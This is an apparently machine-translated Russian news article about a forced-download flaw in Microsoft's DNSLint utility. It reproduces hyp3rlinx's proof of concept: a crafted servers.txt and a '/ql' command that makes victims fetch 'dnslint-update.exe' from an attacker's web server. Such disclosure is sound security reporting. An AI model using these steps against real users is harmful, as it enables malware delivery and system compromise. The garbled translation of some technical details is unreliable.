Переключатель QL служебной программы DNSLint от Microsoft может разрешить загрузку удаленных файлов

Безопасность / Переключатель QL служебной программы DNSLint от Microsoft может разрешить загрузку удаленных файлов 2 минуты на чтение

Корпорация Майкрософт



Microsoft DNSLint Утилита предназначена для диагностики проблем поиска имен в системе доменных имен (DNS), связанных с IP-адресами, выделенными различным веб-серверам, доступ к которым осуществляется через браузер. Он не входит в базовый пакет Windows, но его можно бесплатно загрузить с веб-сайта Microsoft. Уязвимость удаленного доступа получила оценку 7,6 (критическая) на CVSS 3.0 Было обнаружено, что масштабирование влияет на эту утилиту, вызывая принудительную загрузку диска.

Уязвимость возникает из-за того, что DNSLint не проверяет доменные имена при парсинге тестовых файлов DNS в соответствии с параметром «/ ql». В случае, если конечному пользователю удастся использовать такой файл, который содержит сценарий или двоичный код, в отличие от обычно ожидаемой информации о доменном имени, система может быть подвергнута риску, когда становится легко инициировать принудительные загрузки. В этом случае хакер может инициировать принудительную загрузку вредоносного файла, который может загружать и выполнять удаленные команды при доступе через веб-браузер. Загрузка будет сохраняться в локальном системном расположении и запрашивать безопасный доступ, и, видя, что файл поступает из известного места на диске, пользователь может быть склонен разрешить выполнение исполняемого файла. После того как вредоносному файлу будет предоставлена ​​привилегия, он сможет удаленно запустить любой предполагаемый код и поставить под угрозу безопасность и конфиденциальность пользователя.



Джон Пейдж из hyp3rlinx выписал доказательство концепции, моделирующей эту уязвимость, объясняя, что непреднамеренный файл может быть загружен в соответствии со следующими условиями, когда вместо имени домена используется сценарий или двоичный текстовый файл ссылки:



dnslint.exe / v / y / d «ВРЕДОНОСНЫЙ ФАЙЛ» / s X.X.X.X / r «myreport»



В контексте служебной программы DNSLint ниже показано, как можно использовать эту уязвимость для внедрения вредоносного ПО в систему.

1) «dnslint-update.exe» в корневом каталоге удаленного веб-сервера.
2) «servers.txt»
DNSLint
; Это пример входного файла DNSLint
+ Этот DNS-сервер называется: dns1.cp.msft.net
[DNS ~ сервер] X.X.X.X
, a, r; запись A
X.X.X.X, ptr, r; запись PTR
test1, cname, r; запись CNAME
test2, mx, r; запись MX
3) dnslint.exe / ql servers.txt

Приведенный выше код не был изменен, как указано в права hyp3rlinx к этому контенту. Раскрывая эту уязвимость, не похоже, что на данный момент есть какое-либо обновление для решения этой проблемы. Этой уязвимости еще предстоит присвоить код CVE, и он должен быть идентифицирован и написан Microsoft в своем официальном бюллетене по безопасности по этому поводу.